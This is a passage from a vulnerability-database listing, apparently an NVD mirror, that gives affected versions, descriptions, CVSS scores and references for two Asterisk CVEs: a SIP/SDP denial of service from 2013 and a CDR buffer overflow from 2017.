digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.1
digium	asterisk_digiumphones	10.0.0
digium	asterisk_digiumphones	10.0.0
digium	asterisk_digiumphones	10.0.0
digium	asterisk_digiumphones	10.11.0
digium	asterisk_digiumphones	10.11.0
digium	asterisk_digiumphones	10.11.0
digium	asterisk_digiumphones	10.11.0
digium	asterisk_digiumphones	10.12.0
digium	asterisk_digiumphones	10.12.0
digium	asterisk_digiumphones	10.12.0
digium	asterisk_digiumphones	10.12.1
digium	asterisk_digiumphones	10.12.2
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "80A38E0C-45D9-4353-8426-87A4CFA371DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FA4C14B-A01C-4CFE-8985-317ACCDAD209",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1224686C-8A1E-40E1-ACB9-87F571641EAD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "619704FF-2F0C-47E8-A340-58135CEE6B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E412E336-871A-4CAC-97E5-FB203BB9349D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1A0E66-63F4-4BD0-8C9A-3D23A116EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79963FF0-5ED6-41B6-8E60-146BD7879518",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B63FB1C5-9704-4C6A-8DE6-2283D1993BA3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0787BC7B-9464-4AAA-896B-C028ECF8E397",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "84C0FBC8-9CD1-4135-94C7-BE90A7C94625",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DE14D16B-4903-47BD-BCBD-28A8B6B878E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FD3948A1-B5A6-4702-9187-A7720E81B7F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BC097BB6-02E9-4F48-98CB-B5F31B41009C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0992625B-012F-40EA-9A20-6352E633F62B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E3828876-DDB4-457D-8E50-43A4FF761005",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79283554-AF08-44DC-BF98-446C47AA490A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "54EBFD0B-686F-477F-8FF2-535F24A3348B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0961F130-FF8C-41C2-BF2E-9731ED9EB73B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE78F4A2-B165-446C-AA1C-7A9E13718C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9789FC49-DE20-4477-B9D5-12CB71F42E58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DD97918-B589-4422-B695-C3C00203A3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1E59E84-F3FF-44FF-BC7D-31F3880E32F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2D9C7006-F5B1-4171-BB44-182C39DE3AAC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8D2B210-3ADA-40AD-A575-DB88A9F71C91",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F7C53CD-260C-49F5-BCA4-E1D0A58E0B29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "69F2DED4-39F5-44C8-BEA3-22692D28C631",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "AD172E70-238B-4B01-A922-8021B5627092",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5FB3863D-7F46-4C4A-9E6B-C255CDF0D953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7239304D-C383-4F26-BB08-65ADD2380015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AC153C2-258E-4EE6-845F-8E8C68AA242D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "326845DF-2DB2-406B-BE0F-877384DAACFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E0FC2D46-FD1B-421F-8773-BB41B1E9A831",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8788AF7B-CBB6-4D9D-A748-486787935A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB19B2F7-5685-449F-858C-C226D2A373B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D10B9E8C-3B72-490B-A276-A745299DA3C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E63CF763-0682-4453-8D07-C9253C179486",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FDB7AA1-25A7-4BED-A875-C0494E973EA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E0BCE319-8C87-4521-BEAA-02F0EF47B315",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5A2534F0-3DEE-4FCB-B15D-97D1836CE83D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "D3F38B78-8215-43D6-8C5C-6DB8E6C34F06",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CE54B76B-4713-4281-AB4B-B17901121B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "08EE9963-2A44-48A0-8A1B-919CCE3652FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "19C7B58B-6591-45B5-B527-50FA0A5BD1A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "05D3825F-3B95-4056-AF3C-43269734BA2C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "806F60DA-FAA1-4C13-889B-0FF518C01E44",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6DDE265-B4B9-495A-95F7-0910E8199980",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "2365F1EE-16A4-4293-B80E-A51CD6A2F112",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6B7AE7FB-8170-41AD-9597-07335D36AE48",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9131FB32-E3F0-476C-A0D1-36E2101631D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5209356B-4A86-4C93-9D04-C66969F23BC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F087C546-FBCA-4D0D-A023-8F9384CD160C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9AF5750B-2348-4E35-9F08-27E2385E329F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C0344FE7-952A-4BC5-A31F-F2C5EABDB5FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "960521C4-9004-4412-8A38-66240C4B875D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "00F26342-110F-4163-AD11-98AA3B71D299",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8652FA73-2F02-401C-890F-0544276294D3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request."
    },
    {
      "lang": "es",
      "value": "El controlador de canal SIP (channels/chan_sip.c) en Asterisk Open Source 1.8.x (anteriores a 1.8.23.1), 10.x (anteriores a 10.12.3), y 11.x (anteriores a 11.5.1); Certified Asterisk 1.8.15 (anteriores a 1.8.15-cert3) y 11.2 (anteriores a 11.2-cert2); y Asterisk Digiumphones 10.x-digiumphones (anteriores a 10.12.3-digiumphones) permiten a un atcante remoto causar una denegaci\u00f3n de servicio (referencia a puntero nulo, corrupci\u00f3n de memoria, y ca\u00edda del demonio) a trav\u00e9s de un SDP inv\u00e1lido que define una descripci\u00f3n de medios antes de la descripci\u00f3n de conexi\u00f3n en una petici\u00f3n SIP."
    }
  ],
  "id": "CVE-2013-5642",
  "lastModified": "2024-11-21T01:57:52.070",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-09-09T17:55:06.267",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0174.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2013-005.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/96690"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/54534"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/54617"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2013/dsa-2749"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/62022"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1028957"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22007"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0174.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2013-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/96690"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/54534"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/54617"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2013/dsa-2749"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/62022"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1028957"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22007"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-11-09 00:29

Modified

2024-11-21 03:16

Severity ?

8.8 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

A Buffer Overflow issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. No size checking is done when setting the user field for Party B on a CDR. Thus, it is possible for someone to use an arbitrarily large string and write past the end of the user field storage buffer. NOTE: this is different from CVE-2017-7617, which was only about the Party A buffer.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2017-010.html	Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/101760	Third Party Advisory, VDB Entry
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27337	Issue Tracking, Vendor Advisory
cve@mitre.org	https://security.gentoo.org/glsa/201811-11
cve@mitre.org	https://www.debian.org/security/2017/dsa-4076
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2017-010.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/101760	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27337	Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://security.gentoo.org/glsa/201811-11
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2017/dsa-4076

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "88EDB1A9-AC31-4A47-A222-0C4E17274A02",
              "versionEndExcluding": "13.18.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5861B3BC-A35A-4617-A24E-F88D27DBE3F6",
              "versionEndExcluding": "14.7.1",
              "versionStartIncluding": "14.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "651DC4FA-A4EF-40DC-9B54-3ED928A7531A",
              "versionEndExcluding": "15.1.1",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7233B5A2-E1CE-4B7E-99FA-26369B892B25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "F051FE7D-0695-4552-BC1C-836076825606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2E9DFD7C-9ED1-4561-8AFF-69D98E8E398D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CA8BFAC6-17A7-4B80-B436-0FFA4B9EA22A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "954376A0-A03C-47D9-BC5E-14B005DB3940",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1_rc4:*:*:*:*:*:*",
              "matchCriteriaId": "07BB081F-504D-42E3-9CDE-4005572CA0CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "9F379170-DC3B-41B8-B950-7E0E1E6002AD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "338BFA7B-AA84-483F-B298-BC932728E0EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "0A4D417F-485E-4CAD-8542-A22BBA2869E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "61F70CD2-1727-4955-A81B-8927AEF468ED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "A9437455-90FB-4F90-B246-A37E558C9CE5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A Buffer Overflow issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. No size checking is done when setting the user field for Party B on a CDR. Thus, it is possible for someone to use an arbitrarily large string and write past the end of the user field storage buffer. NOTE: this is different from CVE-2017-7617, which was only about the Party A buffer."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de desbordamiento de b\u00fafer se descubri\u00f3 en Asterisk Open Source en versiones 13 anteriores a la 13.18.1, versiones 14 anteriores a la 14.7.1 y versiones 15 antes de la 15.1.1 y en Certified Asterisk 13.13 en versiones anteriores a la 13.13-cert7. No se realizan chequeos de tama\u00f1o cuando se configura el campo user para Party B en un CDR. Por ello, es posible que alguien utilice una cadena arbitraria con una longitud larga y escriba m\u00e1s all\u00e1 del final del b\u00fafer de almacenamiento del campo user. NOTA: esta vulnerabilidad es diferente de CVE-2017-7617, que solo trataba del b\u00fafer Party A."
    }
  ],
  "id": "CVE-2017-16671",
  "lastModified": "2024-11-21T03:16:47.930",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
